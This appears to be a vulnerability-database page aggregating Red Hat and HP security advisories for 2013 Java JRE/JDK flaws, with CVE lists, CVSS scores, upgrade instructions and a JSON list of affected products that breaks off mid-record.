https://www.redhat.com/security/data/cve/CVE-2013-2455.html https://www.redhat.com/security/data/cve/CVE-2013-2456.html https://www.redhat.com/security/data/cve/CVE-2013-2457.html https://www.redhat.com/security/data/cve/CVE-2013-2459.html https://www.redhat.com/security/data/cve/CVE-2013-2463.html https://www.redhat.com/security/data/cve/CVE-2013-2464.html https://www.redhat.com/security/data/cve/CVE-2013-2465.html https://www.redhat.com/security/data/cve/CVE-2013-2466.html https://www.redhat.com/security/data/cve/CVE-2013-2468.html https://www.redhat.com/security/data/cve/CVE-2013-2469.html https://www.redhat.com/security/data/cve/CVE-2013-2470.html https://www.redhat.com/security/data/cve/CVE-2013-2471.html https://www.redhat.com/security/data/cve/CVE-2013-2472.html https://www.redhat.com/security/data/cve/CVE-2013-2473.html https://www.redhat.com/security/data/cve/CVE-2013-3743.html https://access.redhat.com/security/updates/classification/#low
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSZ/wXXlSAg2UNWIIRAh0tAKCyvI+fzg/YQLKd/pOKMVGUasClAACfe8NU txj9ugDGtaxqHsieOTzEGWM= =p6f6 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
It was discovered that GnomeFileTypeDetector did not check for read permissions when accessing files. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03868911
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03868911 Version: 1
HPSBUX02907 rev.1 - HP-UX Running Java7, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2013-07-31 Last Updated: 2013-07-31
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.06 and earlier
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2400 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2443 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-2449 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2458 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2460 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2462 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2467 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2013-3744 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.07 or subsequent
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.07 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.07.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 31 July 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201306-0253", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "freeflow print server 93.e0.21c", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 91.d2.32", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 82.d1.44", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 81.d0.73", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.d2.33", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "freeflow print server 73.c5.11", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise java sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "linux enterprise desktop sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "trio tview software", "scope": "eq", "trust": 0.3, "vendor": "schneider electric", "version": "3.27.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "network satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.18" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.02" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.10" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere cast iron", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "virtualization engine ts7700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 